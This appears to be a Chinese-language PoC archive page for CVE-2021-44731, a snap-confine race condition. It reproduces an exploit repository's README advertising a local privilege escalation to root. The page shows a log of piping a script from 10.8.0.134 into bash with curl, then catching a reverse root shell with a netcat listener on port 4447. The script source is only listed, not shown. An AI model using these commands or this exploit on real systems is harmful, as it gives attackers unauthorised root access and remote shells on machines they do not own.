关联漏洞
标题:Snapd 竞争条件问题漏洞 (CVE-2021-44731)Description:Snapd是开源的一个跨平台的包管理工具。 snapd 2.54.2版本存在竞争条件问题漏洞,该漏洞源于当为snap准备私有挂载命名空间时,snap2.54.2 snap- restricted二进制文件中存在一个竞争条件。这可能允许本地攻击者可利用该漏洞通过在snap的私有挂载名称空间中绑定挂载自己的内容,从而获得根权限,并执行任意代码,从而获得权限升级。
Description
Local Privilege Escalation Exploit for CVE-2021-44731
介绍
# CVE-2021-44731-snap-confine-SUID
Local Privilege Escalation Exploit for CVE-2021-44731, snap-confine 2.54.2 and lower
All credit to Qualys for finding this and providing a detailed exploit.
https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt
Quick and Dirty snap-confine LPE. Will search for vulnerable version of snap-confine, if found will then exploit.
Returns a root shell, catch with netcat
```c
$id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchain)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2073 100 2073 0 0 28397 0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3
```
## Root Shell
```c
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/#
```
文件快照
[4.0K] /data/pocs/d2aab03ac9470db3b66dbb0ceb4b37caed84c6f0
├── [1.4K] README.md
└── [1.9K] snap_confine_LPE.sh
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。